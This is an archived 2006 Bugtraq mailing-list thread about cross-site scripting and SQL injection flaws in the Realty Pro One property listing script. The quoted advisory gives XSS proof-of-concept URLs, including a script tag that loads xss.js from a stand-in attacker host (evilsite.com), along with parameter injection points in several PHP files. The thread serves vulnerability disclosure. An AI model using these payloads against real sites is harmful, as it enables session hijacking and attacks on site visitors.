[<prev] [next>] [day] [month] [year] [list]
Message-ID: <F50FBEAD7A52B8468B9F3C875916681A07D5B77E@BXCH2K.bjw2k.asg>
Date: Thu, 25 May 2006 14:21:50 -0400
From: "Krpata, Tyler" <tkrpata@....com>
To: <luny@...fucktard.com>, <bugtraq@...urityfocus.com>
Subject: RE: Realty Pro One Property Listing Script
Isn't the SQL injection vulnerability a bit more critical here?
-----Original Message-----
From: luny@...fucktard.com [mailto:luny@...fucktard.com]
Sent: Tuesday, May 23, 2006 7:39 PM
To: bugtraq@...urityfocus.com
Subject: Realty Pro One Property Listing Script
Realty Pro One
http://realtypro1.2run2.com/index.php
Description:
Realty Pro One is a powerful property listing tool with many features.
Effected files:
searchlookup.php
images.php
index_other.php
request_info.php
?listingid
Exploits & Vulns:
XSS Vulnerability by the listingid variable:
http://www.example.com/listings/?listingid=<SCRIPT%20SRC=http://evilsite
.com/xss.js></SCRIPT>
Also outputs SQL Query error msg:
You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for the right syntax to use near 'This is
remote text via xss.js located at
evilsite.comPHPSESSID=f085540569ca117edda59a119e98fcc4 ORDER BY rl_re
More XSS Vulnerabilities:
http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS]
http://www.example.com/images.php?id=[XSS]
http://www.example.com/listings/index_other.php?listingid=[XSS]
By putting "> and <" infront and behind our script tags:
http://www.example.com/listings/request_info.php?agentid=101005">[XSS]<"
&listtype=homes&listingid=222003
No version # for this script was given on the website.
Powered by blists - more mailing lists